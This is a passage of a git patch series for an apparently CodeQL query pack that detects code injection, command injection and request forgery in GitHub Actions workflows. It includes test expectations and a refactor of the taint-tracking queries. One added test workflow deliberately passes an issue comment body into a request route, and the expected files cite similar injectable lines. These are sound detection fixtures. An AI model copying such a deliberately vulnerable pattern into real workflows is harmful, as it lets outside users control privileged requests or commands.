user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d4fd27b18d4..f852a1b5981 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -3,7 +3,6 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -64,15 +63,10 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -202,14 +196,10 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml new file mode 100644 index 00000000000..6937467453b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -0,0 +1,10 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: octokit/request-action@v2 + with: + route: ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected new file mode 100644 index 00000000000..d980139bb35 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref new file mode 100644 index 00000000000..fcb4e41daf8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -0,0 +1 @@ +Security/CWE-918/RequestForgery.ql From 92dbceb5070bc70b09c182385461ba6f7e056592 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 10:19:08 +0100 Subject: [PATCH 0121/1267] boost pack versions --- ql/lib/qlpack.yml | 8 ++++---- ql/src/qlpack.yml | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a0f348977ab..d211b8fc2ba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,12 +2,12 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1 +version: 0.0.2 dependencies: - codeql/controlflow: ^0.1.7 - codeql/yaml: "*" + codeql/controlflow: "*" + codeql/dataflow: "*" codeql/util: "*" - codeql/dataflow: ^0.1.7 + codeql/yaml: "*" dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aff53d45dde..61ef9d40ab5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.1 +version: 0.0.2 groups: - actions - queries From a36ae6a7e2eec938a81ae1a4b54273e81e5b5bea Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 11:07:01 +0100 Subject: [PATCH 0122/1267] Add `GITHUB_TOKEN` --- action.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/action.yml b/action.yml index a294e981493..f88e3b07850 100644 --- a/action.yml +++ b/action.yml @@ -24,6 +24,7 @@ runs: - name: Do something with context shell: bash env: + GITHUB_TOKEN: ${{ github.token }} GH_TOKEN: ${{ github.token }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 169e57e87499fbe591a0e2f3d088b4ce68f02632 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 11:10:41 +0100 Subject: [PATCH 0123/1267] Refactor queries --- .../actions/security/CodeInjectionQuery.qll | 25 ++ .../security/CommandInjectionQuery.qll | 22 ++ .../actions/security/RequestForgeryQuery.qll | 22 ++ ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 12 +- .../CWE-020/ReusableWorkflowsSinks.ql | 12 +- ql/src/Security/CWE-078/CommandInjection.ql | 24 +- .../CWE-078/CriticalCommandInjection.ql | 45 --- .../CWE-078/PrivilegedCommandInjection.ql | 29 ++ ql/src/Security/CWE-094/CodeInjection.ql | 24 +- .../Security/CWE-094/CriticalCodeInjection.ql | 47 --- .../CWE-094/CriticalExpressionInjection.ql | 48 --- .../Security/CWE-094/ExpressionInjection.ql | 42 --- .../CWE-094/PrivilegedCodeInjection.ql | 31 ++ ql/src/Security/CWE-918/RequestForgery.ql | 24 +- .../CWE-078/CriticalCommandInjection.qlref | 1 - ...ed => PrivilegedCommandInjection.expected} | 2 +- .../CWE-078/PrivilegedCommandInjection.qlref | 1 + .../Security/CWE-094/CodeInjection.expected | 272 +++++++++++++++++ .../CWE-094/CriticalCodeInjection.expected | 14 - .../CWE-094/CriticalCodeInjection.qlref | 1 - .../CWE-094/CriticalExpressionInjection.qlref | 1 - .../CWE-094/ExpressionInjection.expected | 276 ------------------ .../CWE-094/ExpressionInjection.qlref | 1 - ...ected => PrivilegedCodeInjection.expected} | 150 +++++----- .../CWE-094/PrivilegedCodeInjection.qlref | 1 + 26 files changed, 501 insertions(+), 628 deletions(-) create mode 100644 ql/lib/codeql/actions/security/CodeInjectionQuery.qll create mode 100644 ql/lib/codeql/actions/security/CommandInjectionQuery.qll create mode 100644 ql/lib/codeql/actions/security/RequestForgeryQuery.qll delete mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-078/PrivilegedCommandInjection.ql delete mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql delete mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql delete mode 100644 ql/src/Security/CWE-094/ExpressionInjection.ql create mode 100644 ql/src/Security/CWE-094/PrivilegedCodeInjection.ql delete mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref rename ql/test/query-tests/Security/CWE-078/{CriticalCommandInjection.expected => PrivilegedCommandInjection.expected} (58%) create mode 100644 ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref rename ql/test/query-tests/Security/CWE-094/{CriticalExpressionInjection.expected => PrivilegedCodeInjection.expected} (70%) create mode 100644 ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll new file mode 100644 index 00000000000..c2453cb1652 --- /dev/null +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -0,0 +1,25 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { + exists(Run e | e.getAnScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "code-injection") + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module CodeInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module CodeInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll new file mode 100644 index 00000000000..8eda87f1cae --- /dev/null +++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module CommandInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module CommandInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll new file mode 100644 index 00000000000..80e3d93ee69 --- /dev/null +++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a system command. + */ +private module RequestForgeryConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */ +module RequestForgeryFlow = TaintTracking::Global; diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 7adbcd5adbd..44897ef3311 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -14,4 +14,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 0ea0713983d..54f58e6b63e 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -12,24 +12,16 @@ */ import actions -import codeql.actions.DataFlow +import codeql.actions.security.CodeInjectionQuery import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { exists(CompositeAction c | c.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 31fbc1eaae2..2dd5bf1cfef 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,24 +12,16 @@ */ import actions -import codeql.actions.DataFlow +import codeql.actions.security.CodeInjectionQuery import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { exists(ReusableWorkflow w | w.getAnInput() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index bdc341e8caf..826a3b41e38 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -13,27 +13,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph -private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink +where CommandInjectionFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql deleted file mode 100644 index dddbd142873..00000000000 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ /dev/null @@ -1,45 +0,0 @@ -/** - * @name Command built from user-controlled sources - * @description Building a system command from user-controlled sources is vulnerable to insertion of - * malicious code by the user. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-command-injection - * @tags actions - * security - * external/cwe/cwe-078 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential critical command injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql new file mode 100644 index 00000000000..6f66535e6a4 --- /dev/null +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -0,0 +1,29 @@ +/** + * @name Command built from user-controlled sources on a privileged context + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.security.CommandInjectionQuery +import CommandInjectionFlow::PathGraph + +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w +where + CommandInjectionFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential privileged command injection in $@, which may be controlled by an external user.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 3bac9cec348..f71c178822c 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -15,27 +15,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph -private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink +where CodeInjectionFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql deleted file mode 100644 index 64d8a6e4328..00000000000 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ /dev/null @@ -1,47 +0,0 @@ -/** - * @name Code injection - * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary - * code execution. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-code-injection - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential critical code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql deleted file mode 100644 index e24b1ab9ddc..00000000000 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ /dev/null @@ -1,48 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity error - * @security-severity 9 - * @precision high - * @id actions/critical-expression-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = 